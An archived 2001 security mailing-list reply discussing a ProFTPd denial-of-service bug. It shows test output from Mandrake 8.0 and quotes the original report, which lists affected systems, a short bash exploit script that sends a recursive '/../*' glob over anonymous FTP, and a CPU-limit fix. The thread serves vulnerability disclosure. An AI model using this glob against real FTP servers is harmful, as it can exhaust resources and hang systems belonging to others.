Re: Multiple-Vendor-FTP-Vuln. (old?)

From: Dmitriy Kropivnitskiy (dkropivnitskiyat_private)
Date: Tue Aug 21 2001 - 07:46:39 PDT

Next message: Curt Sampson: "Re: HTML email "bug", of sorts."

Previous message: Sean Straw / PSE: "Re: HTML email "bug", of sorts."
In reply to: Enrico Kern: "Multiple-Vendor-FTP-Vuln. (old?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Tested on Mandrake 8.0. ProFTPd version is proftpd-1.2.2-0.rc1.3mdk.
Here are results:

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of
/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Transfer complete.
226 Quotas off
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of
/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Transfer complete.
226 Quotas off
ftp> quit
221 Goodbye.
[root@system user]# ps aux | grep ftp
nobody    3773  0.0  0.4  2152 1052 ?        S    10:44   0:00 proftpd (acceptin

On Mon, Aug 20, 2001 at 03:20:35PM +0200, Enrico Kern wrote:
> Hi,
> 
> i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
> many new Linux-Dist.. When a user logged in in ftp and type
> the ls command the in.ftpd takes over 90 percent cpu-usage and execute =
> the command 2 or 3x than the full system hang up. it also works in =
> console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ  =
> in march 01, but
> it still works so i post it again.
> 
> affected:
> 
> RedHat Linux 7.x
> Linux Mandrake 8.0
> SuSE Linux 7.2
> FreeBSD 4.3
> AiX V 4.3
> other?
> 
> 
> Not vuln.:
> 
> latest Wu-Ftpd
> Windows FTP-Server
> 
> 
> Exploit:
> 
> #!/bin/bash=20
> ftp -n FTP-SERVER<<\end=20
> quot user anonymous
> bin
> quot pass shitoldat_private
> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
> bye=20
> end=20
> 
> Fix:
> 
> set cpu-limit for your anonymous user.
> 
> 
> -------------------------
> Enrico Kern
> www.h07.org
> _______________________________________________________________________
> 1.000.000 DM gewinnen - kostenlos tippen - http://millionenklick.web.de
> IhrNameat_private, 8MB Speicher, Verschluesselung - http://freemail.web.de
> 
>

Next message: Curt Sampson: "Re: HTML email "bug", of sorts."
Previous message: Sean Straw / PSE: "Re: HTML email "bug", of sorts."
In reply to: Enrico Kern: "Multiple-Vendor-FTP-Vuln. (old?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Aug 21 2001 - 09:58:47 PDT